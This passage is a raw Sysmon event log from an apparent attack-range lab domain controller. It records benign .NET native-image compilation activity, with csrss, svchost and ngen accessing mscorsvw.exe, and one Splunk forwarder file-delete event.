14:57:49.842{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBED-607E-640D-00000000BB01}3168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.842{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBED-607E-640D-00000000BB01}3168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.780{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBED-607E-630D-00000000BB01}5000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.764{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBED-607E-630D-00000000BB01}5000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.764{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBED-607E-630D-00000000BB01}5000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.701{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBED-607E-620D-00000000BB01}1648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.686{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBED-607E-620D-00000000BB01}1648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.686{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBED-607E-620D-00000000BB01}1648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.639{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBED-607E-610D-00000000BB01}6184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.623{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBED-607E-610D-00000000BB01}6184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.623{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBED-607E-610D-00000000BB01}6184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.561{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBED-607E-600D-00000000BB01}1108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.545{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBED-607E-600D-00000000BB01}1108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.545{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBED-607E-600D-00000000BB01}1108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.420{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBED-607E-5F0D-00000000BB01}3628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.405{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBED-607E-5F0D-00000000BB01}3628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.405{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBED-607E-5F0D-00000000BB01}3628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.311{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBED-607E-5E0D-00000000BB01}5360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.295{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBED-607E-5E0D-00000000BB01}5360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.295{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBED-607E-5E0D-00000000BB01}5360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.170{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EF275D83C01C6B85D2AF58D0626EBA98,SHA256=DE80532D3D792DACCF2B03CD8B4DCF7CCC8FB7E840ACC320B3017AAA2EF31493,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.155{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBED-607E-5D0D-00000000BB01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.139{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBED-607E-5D0D-00000000BB01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:49.139{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBED-607E-5D0D-00000000BB01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Mi